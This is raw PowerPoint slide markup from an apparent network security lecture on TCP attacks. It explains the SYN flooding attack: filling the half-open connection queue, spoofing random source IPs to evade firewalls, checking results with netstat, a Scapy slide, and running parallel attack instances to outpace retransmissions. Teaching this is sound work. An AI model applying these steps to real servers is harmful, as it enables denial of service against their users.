            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> half-open connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> as only client-server connection is confirmed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The server stores the TCB in a queue that is only for the half-open connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>After the server gets ACK packet, it will take this TCB out of the queue and store in a different place.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If ACK doesn’t arrive, the server will resend SYN+ACK packet. The TCB will eventually be discarded after a certain time period.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SYN Flooding Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Shape 160"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311701" y="1152475"/>
            <a:ext cx="5259366" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Idea : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To fill the queue storing the half-open connections so that there will be no space to store TCB for any new half-open connection, basically the server cannot accept any new SYN packets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Steps to achieve this : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Continuously send a lot of SYN packets to the server. This consumes the space in the queue by inserting the TCB record.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Do not finish the 3rd step of handshake as it will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dequeue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> the TCB record.</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9" y="1329599"/>
            <a:ext cx="3237185" cy="28529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SYN Flooding Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="Shape 1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Bef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>When flooding the server with SYN packets, we need to use random source IP addresses; otherwise the attacks may be blocked by the firewalls.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The SYN+ACK packets sent by the server may be dropped because forged IP address may not be assigned to any machine. If it does reach an existing machine, a RST packet will be sent out, and the TCB will be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dequeued</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>As the second option is less likely to happen, TCB records will mostly stay in the queue. This causes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SYN Flooding Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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Launching SYN Flooding Attack – Before Attacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="173" name="Shape 173"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1494375"/>
            <a:ext cx="5860500" cy="2639875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="Shape 174"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6365366" y="2644514"/>
            <a:ext cx="2380701" cy="2062952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0"/>
              <a:t>TCP States</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LISTEN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: waiting for TCP connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ESTABLISHED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: completed 3-way handshake</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SYN_RECV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: half-open connections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Right Arrow 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6265333" y="1878744"/>
            <a:ext cx="448734" cy="26246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14067" y="1840700"/>
            <a:ext cx="2180405" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Check the TCP states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SYN Flooding Attack - Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190" name="Shape 190"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5360475" y="889150"/>
            <a:ext cx="3599100" cy="4186200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> command, we can see that there are a large number of half-open connections on port 23 with random source IPs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using top command, we can see that CPU usage is not high on the server machine. The server is alive and can perform other functions normally, but cannot accept telnet connections only.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="191" name="Shape 191"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152476"/>
            <a:ext cx="4827675" cy="1217200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="192" name="Shape 192"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="347300" y="2190975"/>
            <a:ext cx="4827650" cy="408425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="193" name="Shape 193"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="386725" y="3033350"/>
            <a:ext cx="4827650" cy="1735775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="Shape 194"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066875" y="1152475"/>
            <a:ext cx="1123200" cy="2472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solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="Shape 195"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066875" y="3033350"/>
            <a:ext cx="536700" cy="1698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solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4301067" y="1337733"/>
            <a:ext cx="753533" cy="1261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B35263-B4ED-A234-B2E4-B661A2A200B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="347300" y="2589898"/>
            <a:ext cx="4820060" cy="5105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BE3A-6B1F-3D46-55CF-5369224AF60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Launching SYN Flooding Attacks Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scapy</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159E7AA-5BBE-97F8-B126-522546579264}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1257300"/>
            <a:ext cx="6280233" cy="3436623"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1410518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7EEF-2135-4385-A62A-14058E6AB272}"/>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What Makes SYN Flooding Attack Fail</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B8982F3-71FD-98CF-DDE0-E81EFAA969FE}"/>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TCP Reset Packets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TCP retransmission (On Server)	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The size of the SYN queue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TCP Cache</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3909840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C6F1-139A-4FC7-FCC1-F4B5674F6E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What Makes SYN Flooding Attack Fail</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14A4D49A-0267-8731-FC32-EBC92D30F5D2}"/>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TCP Reset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A098D619-2D26-B9DE-2CAB-6E19AC61D8F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="24176" b="13523"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1279072" y="1833308"/>
            <a:ext cx="5754572" cy="2668786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94634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Outline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Shape 6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What is TCP protocol?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How the TCP Protocol Works</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SYN Flooding Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TCP Reset Attack	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TCP Session Hijacking Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitnick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"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t> • TCP Retransmission Issue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="Shape 1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Aft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>After sending out the SYN+ACK packet, the victim machine will wait for the ACK packet. If it does not come in time, TCP will retransmit the SYN+ACK packet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How many times it will retransmit depends on the following kernel parameters (by default, its value is 5)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>After these 5 retransmissions, TCP will remove the corresponding item from the half-open connection queue. Every time when an item is removed, a slot becomes open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To win the competition, we can run multiple instances of the attack program in parallel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443" y="2674611"/>
            <a:ext cx="4300569" cy="442916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="920745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t> Size of The Queue</a:t>
            </a:r>
          </a:p>
